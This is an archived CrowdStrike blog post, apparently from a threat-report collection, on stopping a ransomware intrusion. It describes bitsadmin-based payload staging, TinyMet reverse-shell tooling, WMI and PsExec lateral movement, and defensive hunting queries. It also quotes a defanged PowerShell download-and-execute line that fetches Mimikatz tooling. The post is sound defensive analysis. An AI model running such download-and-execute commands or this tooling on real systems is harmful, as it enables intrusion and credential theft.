{
	"id": "daf387a7-519e-4d09-aa02-1d318a208c31",
	"created_at": "2026-04-06T00:17:53.260412Z",
	"updated_at": "2026-04-10T03:21:09.558877Z",
	"deleted_at": null,
	"sha1_hash": "f646d5be3ea88d8750cce1d1e14eb8aca3b89d68",
	"title": "Response When Minutes Matter: Rising Up Against Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1342751,
	"plain_text": "Response When Minutes Matter: Rising Up Against Ransomware\r\nBy Falcon Complete Team\r\nArchived: 2026-04-05 12:36:09 UTC\r\nThis blog describes a recent incident that highlights the CrowdStrike Falcon® Complete™ team’s ability to act as\r\nan extension of a customer’s security team to quickly detect, triage and contain an active attacker before it was\r\nable to achieve its goal. In this example, we outline how a fast, coordinated response by the Falcon Complete,\r\nFalcon OverWatch™ threat hunting and CrowdStrike® Intelligence teams — over a holiday weekend — stopped\r\na big game hunting ransomware actor in its tracks. This response methodology protects our customers 24/7/365\r\nand delivers on the CrowdStrike promise: We stop breaches.\r\nThe Initial Detection\r\nThe CrowdStrike Falcon® agent identified that “a process attempted to download a file using bitsadmin in an\r\nunusual way,” which caused a “High” alert within the Falcon UI and the Falcon Complete team’s queue.\r\nFigure 1. Process tree for the initial detection\r\nThe high severity quickly caught the attention of Falcon Complete,\r\nand after expanding the process tree within the Falcon UI, analysts’ suspicions of ongoing nefarious activities\r\nwere raised. The team quickly identified initial reconnaissance commands, followed immediately by a pivot into a\r\n“living off the land” technique of abusing bitsadmin.exe to download an unknown file. (“Living off the land” is a\r\nwell-known technique where threat actors use built-in features to slip under the radar of less sophisticated\r\nendpoint detection and response (EDR) solutions.) Spawning from wmiprvse.exe, which suggests WMI lateral\r\nmovement, bitsadmin — an inbuilt Windows Administrator tool commonly used by threat actors to download files\r\n— was used to download the unknown file “cmk.ex” from a remote address via port 81 to\r\nC:\\Users\\Public\\Pictures\\cmk.ex. 
This file was then renamed, using the Windows tool “move,” to a Windows-recognized executable extension file “cmk.exe.” The use of port 81 and a non-standard executable extension,\r\nhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\r\nPage 1 of 6\n\nwhich was then locally renamed, was assessed to be an attempt to avoid detection by potential network intrusion\ndetection systems.\nOnce renamed, the file was executed with the command line “cmk.exe 1 80.” Utilizing unique\nstrings appearing within the binary, obtained using the strings utility, Falcon Complete determined that the file\nwas a custom-compiled, packed and heavily obfuscated version of the tool TinyMet.\nTinyMet\nUsage: tinymet.exe LHOST LPORT\nAvailable transports are as follows:\n 0: reverse_tcp\n 1: reverse_http\n 2: reverse_https\n 3: bind_tcp\nFigure 2. Usage for TinyMet.exe, from the GitHub repo\nAt this stage, the Falcon Complete team was confident\nthat this activity was not benign and began a quick and calculated remediation effort to remove the threat without\ncausing an unnecessary negative business impact. Falcon Complete began by killing and remediating cmk.exe to\nensure its added capabilities were not available to the threat actor.\nHowever, shortly after the removal of the cmk.exe file, Falcon blocked and alerted on a WMI lateral movement\nattempting to spawn and run a PowerShell downgrade attack followed by an attempted download and execution of\nthe post-exploitation tool Mimikatz.\niex((new-object net.webclient).DownloadString('hxxps\u003c://\u003eraw\u003c.\u003egithubusercontent\u003c.\u003ecom/PowerShellMafia/PowerSpl\nFigure 3. Command line for the Mimikatz detection\nAt this point, Falcon Complete assessed that the risk posed to\nthe host and the environment was too high to allow attempts to continue while investigating. Therefore, the\npreventive step of network containment was taken against the host. 
This denied all access to the host, other than\nvia the Falcon platform, and gave Falcon Complete time to safely delve into the detection data.\nFrom here, Falcon Complete pivoted the investigation to the extensive investigation toolset within the Falcon\nUI — including User Search and Endpoint Activity Monitoring (EAM) — to gain further context and determine\nthe origin of the activity.\nFinding Patient Zero\nAs identified, WMI was being used to laterally move from another host, and Falcon Complete now began to dig to\nfind Patient Zero and any files or commands that had been run on the host.\nThe lightweight CrowdStrike Falcon® agent provides a rich source of EDR telemetry that gives critical\ninsights into the behavior of each endpoint. Our EAM application gives the Falcon Complete team and Falcon\ncustomers the ability to search this execution data in real time to quickly investigate and scope the extent of\ncompromise for an incident.\nThis telemetry, combined with pre-defined reporting in Falcon’s Investigate app, enabled the Falcon Complete\r\nteam to identify compromised user accounts and the original source of the threat actor’s activity. During the\r\ninvestigation, Falcon OverWatch simultaneously pushed a detection to the Falcon Complete team for review — it\r\ninvolved additional lateral movement attempts from an IP that did not have the Falcon agent installed, leveraging\r\nPSExec to run reconnaissance commands on further hosts, and to write a binary with the name “info.zip.”\r\nFigure 4. 
Process tree for the Falcon OverWatch alert\r\nWith the attacker methodology flagged by Falcon\r\nOverWatch, the Falcon Complete team was able to use specialized EAM searches to track the activity to a specific\r\nsystem on the network.\r\nevent_simpleName=ProcessRollup2 (FileName=psexecsvc.exe OR FileName=wsmprovhost.exe)\r\n| stats values(FileName) AS Parent, values(CommandLine) AS ParentCmd by ComputerName TargetProcessId_decimal\r\n| join aid TargetProcessId_decimal\r\n [ search ProcessRollup2\r\n | stats values(FileName) AS FileName,\r\nvalues(CommandLine) AS ChildCommand by ComputerName ParentProcessId_decimal\r\n | rename FilePath AS ChildPath\r\n| eval TargetProcessId_decimal=ParentProcessId_decimal ]\r\nFigure 5. Falcon EAM Query for all PSExec lateral movement telemetry data\r\nArmed with the origin system, it\r\nwas possible to use Host Search in the Investigate app to identify the most recently logged-on user, which allowed\r\na further pivot to User Search to identify where the compromised account had been used to log in to other systems\r\nvia legitimate Windows means. Due to the telemetry available from the Falcon sensor in the environment, the\r\n“living off the land” attempt did not work.\r\nevent_simpleName=UserLogon (LogonType_decimal=\"3\" OR LogonType_decimal=\"10\") | eval timestamp=(timestamp / 1000\r\n| convert timeformat=\"%FT%H:%M:%S.%3N UTC\" ctime(timestamp) AS timestamp_readable | stats count AS Count, min(ti\r\n| sort timestamp_readable\r\nFigure 6. 
Falcon EAM Query for all RDP logon telemetry data\r\nBecause logon events are closely tracked\r\nby the Falcon agent, and we know that tools such as PSExec and RDP (Remote Desktop Protocol) generate\r\nType 3 or Type 10 logon events within the data collected by Falcon (and Windows event logs), we can use this\r\nknowledge and Falcon’s event data to more quickly obtain valuable information normally tracked in Windows\r\nlogs. In this case, we can obtain the logon times, source network address and username that are being used by the\r\nthreat actor and use this information to inform actions taken by the Falcon Complete team, as well as those\r\nundertaken by the customer. Using the above query, the Falcon Complete team was able to build a complete\r\npicture of the compromised account within minutes and identify Patient Zero — the compromised system and user\r\nthat was the source of the RDP logons and PSExec commands. Falcon Complete noted during the investigation\r\nthat in nearly all of the lateral movement attempts by the threat actor, regardless of execution method, the\r\nparent process was WMIPrvSE.exe — the Windows binary responsible for executing remote WMI calls.\r\nA further query could be used to confirm our suspicions and ensure that Patient Zero was successfully identified.\r\nevent_simpleName=WmiCreateProcess | eval timestamp=(timestamp / 1000)\r\n| convert timeformat=\"%FT%H:%M:%S.%3N UTC\" ctime(timestamp) AS ExecutionTime\r\n| table ExecutionTime, ComputerName, RemoteAddressIP4, LocalAddressIP4, CommandLine\r\n| sort ExecutionTime\r\nFigure 7. 
Falcon EAM Query, which provides all remote WMI executions and sorts by time in an environment\r\nArmed with data confirming Patient Zero via several “living off the land” techniques leveraged by the threat actor,\r\nFalcon Complete was able to confidently assess the source of the intrusion, begin to implement policies that\r\nwould slow the actor, and inform the customer of actions to be taken to fully remove the threat from the\r\nenvironment, such as installing the Falcon agent on the source host so that network containment and remediation\r\ncould begin at the source. Because Falcon Complete sees a wide range of adversarial threats daily, we can develop\r\nqueries such as those shown to enable fast triage and response to detections in situations where every minute\r\nmatters.\r\nThe Remediation\r\nIn this case, the threat was an active hands-on-keyboard attack, and after non-business-disruptive remediation\r\nproved unsuccessful, Falcon Complete opted to network-contain hosts that the threat actor had access to. This led\r\nto five hosts being contained in the environment. Once contained, all artifacts, including executables and\r\npersistence, were remediated from the hosts.\r\nTo ensure full remediation, actions that needed to be taken outside of the scope of the Falcon sensor were\r\nescalated to the customer:\r\nDisabling of the compromised account\r\nBlocking threat actor infrastructure at perimeter firewalls\r\nInstallation of the Falcon sensor onto Patient Zero\r\nDue to this activity being both over a holiday weekend and after-hours for the customer, we did not receive\r\nimmediate responses from our escalations. 
As a result, and to help contain the threat actor, Falcon Complete\r\nimplemented a custom indicator of attack (IOA) that would detect, in real time, any connections from the\r\nunmanaged Patient Zero device or the command and control (C2) identified. This would allow immediate\r\ninvestigation and response before the threat actor could take any meaningful action on the newly accessed host. To\r\nfurther this custom IOA, all bespoke tools used by the threat actor were blocklisted in the Falcon UI.\r\nFigure 8. Falcon detection showing blocked C2 connection\r\nOnce we received replies from the customer shortly\r\nthereafter, the customer was able to quickly install the Falcon sensor onto the unmanaged Patient Zero due to the\r\nFalcon platform’s lightweight, single-agent architecture. Immediately, Falcon Complete began to use the Falcon\r\nReal Time Response (RTR) functionality to triage the host. With the intelligence and TTPs gained from the\r\ninvestigation, Falcon Complete was quickly able to pivot to the known locations where the threat actor stored tools and\r\ndata. Falcon Complete located a number of reconnaissance files, including lists of 50 internal IP addresses as well\r\nas bespoke scripts to build the toolset observed on the hosts previously remediated. Again, Falcon Complete\r\nremediated the malicious tools and threat-actor-gathered intelligence on this host. 
Once Patient Zero was\r\nremediated and the compromised account disabled, this instance of the threat could be considered successfully\r\nneutralized.\r\nCrowdStrike Intelligence Analysis\r\nPer the standard procedure of the Falcon Complete team, we provided the CrowdStrike Intelligence team with\r\nsamples of the cmk.exe and info.zip files, as well as the network indicators identified during the investigation.\r\nOf interest to our investigation, the Intelligence team identified that the staging IP address was also\r\nhosting an additional file on port 81 named 2.zip, which contained a binary identified as a known ransomware\r\nvariant.\r\nWhile the CrowdStrike Intelligence team does not specifically attribute this attack to any named adversaries or\r\nany specific ransomware-as-a-service (RaaS) affiliate, the quick actions from the Falcon Complete team almost certainly prevented\r\nthis customer from becoming a victim of a big game hunting ransomware operation.\r\nSummary\r\nFalcon Complete initially identified an executable download of TinyMet and the attempted execution of a TCP\r\nreverse shell within our customer’s environment. Using Process Explorer as well as EAM, we were able to\r\nidentify multiple attempts at lateral movement from a host that did not have the Falcon sensor installed.\r\nFalcon Complete then used the Host Search functionality to identify the compromised user credentials before\r\npivoting to User Search to identify where the compromised user account was being used for lateral movement.\r\nThis allowed us to place those hosts into network containment, as well as block lateral movement attempts from\r\nthe host without the Falcon sensor. We were able to block the threat actor’s malicious executables and stop them in\r\ntheir tracks. 
These quick actions protected our customer and almost certainly prevented them from falling victim\r\nto a ransom attempt. All of this malicious activity and the Falcon Complete team’s response and remediation\r\nhappened over a holiday weekend, showing the importance of 24/7/365 security monitoring in a corporate\r\nenvironment and the power of partnering with CrowdStrike and Falcon Complete. The Falcon Complete team’s\r\nresponse methodology provides these kinds of results for our customers at all hours of every day to stop breaches.\r\nWe look forward to sharing more case studies and providing some best practices for quick and effective incident\r\nresponse.\r\nAdditional Resources\r\nLearn more by visiting the Falcon Complete product webpage.\r\nRead a white paper: CrowdStrike Falcon® Complete: Instant Cybersecurity Maturity for Organizations of\r\nAll Sizes.\r\nTest CrowdStrike next-gen AV for yourself: Start your free trial of Falcon Prevent™.\r\nSource: https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"
	],
	"report_names": [
		"how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack"
	],
	"threat_actors": [],
	"ts_created_at": 1775434673,
	"ts_updated_at": 1775791269,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f646d5be3ea88d8750cce1d1e14eb8aca3b89d68.pdf",
		"text": "https://archive.orkl.eu/f646d5be3ea88d8750cce1d1e14eb8aca3b89d68.txt",
		"img": "https://archive.orkl.eu/f646d5be3ea88d8750cce1d1e14eb8aca3b89d68.jpg"
	}
}